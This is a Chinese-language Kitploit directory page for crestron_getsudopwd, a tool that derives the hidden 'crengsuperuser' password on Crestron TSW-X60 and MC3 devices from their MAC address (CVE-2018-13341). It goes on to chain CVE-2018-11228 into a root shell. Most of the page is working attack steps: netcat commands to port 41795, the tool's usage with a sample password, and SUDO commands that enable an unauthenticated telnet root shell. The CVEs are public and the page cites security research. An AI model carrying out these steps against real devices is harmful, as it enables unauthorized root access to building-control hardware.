Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
crestron_getsudopwd — 利用 CVE-2018-13341 的工具,用于恢复 Crestron 设备上的隐藏账户密码 | Kitploit
工具/GitHubGitHub/axcheron/crestron_getsudopwd
嵌入式系统安全密码破解漏洞分析漏洞利用渗透测试硬件安全红队
GitHubaxcheron/crestron_getsudopwd

crestron_getsudopwd

利用 CVE-2018-13341 的工具,用于恢复 Crestron 设备上的隐藏账户密码

查看仓库
26636年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

crestron_getsudopwd

基于 Ricky Lawshae 在 Crestron TSW-X60 和 MC3 设备上的发现,本工具旨在利用 CVE-2018-13341。通过目标设备的 MAC 地址,你可以恢复隐藏账户 "crengsuperuser" 的密码,该账户拥有提升权限并允许你运行 SUDO 命令。

描述

在 Crestron TSW-X60(版本低于 2.001.0037.001)和 MC3(版本低于 1.502.0047.00)设备上,特殊 sudo 账户的密码可以通过普通用户可访问的信息计算得出。攻击者可能破解这些密码,从而执行隐藏的 API 调用,并以提升的权限逃离 CTP 控制台沙箱环境。

可通过访问 TSW-XX60 设备的端口 41795 连接 Crestron Toolbox 协议(CTP)。然后,你可以使用 estat 命令获取设备的 MAC 地址:

root@kitploit:~
$ nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

需求

该工具需要 cryptography 模块。

root@kitploit:~
$ pip3 install cryptography

或

root@kitploit:~
$ pip3 install -r requirements.txt

开始使用

root@kitploit:~
usage: crestron_getsudopwd.py [-h] [-m MAC]

用于生成 Crestron 隐藏账户密码的工具

optional arguments:
  -h, --help         显示此帮助信息并退出
  -m MAC, --mac MAC  目标 MAC 地址(不带冒号或点)


# 示例
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t

利用 CVE-2018-11228

CVE-2018-11228 允许通过 Crestron 终端协议(CTP)中的 Bash Shell 服务实现未经认证的远程代码执行。在获得隐藏账户 "crengsuperuser" 的密码后,你可以在底层 Linux 系统上获得 root 访问权限。

root@kitploit:~
$ nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

然后,在新的 shell 中,你可以在设备上获得 root 访问权限。

root@kitploit:~
$ telnet w.x.y.z

bash-3.2# whoami
root

注意: 此示例适用于 TSW 设备。对于 MC3 设备,过程略有不同。你需要使用以下命令来启用 shell:SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0 然后,SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:

资源

以下是一些与此漏洞相关的有趣资源:

  • 关于 Crestron TSW-XX60 触摸面板设备的安全公告
  • Ricky "HeadlessZeke" Lawshae - Github
  • 入侵 Crestron 物联网自动化系统 - DEFCON 26
下载工具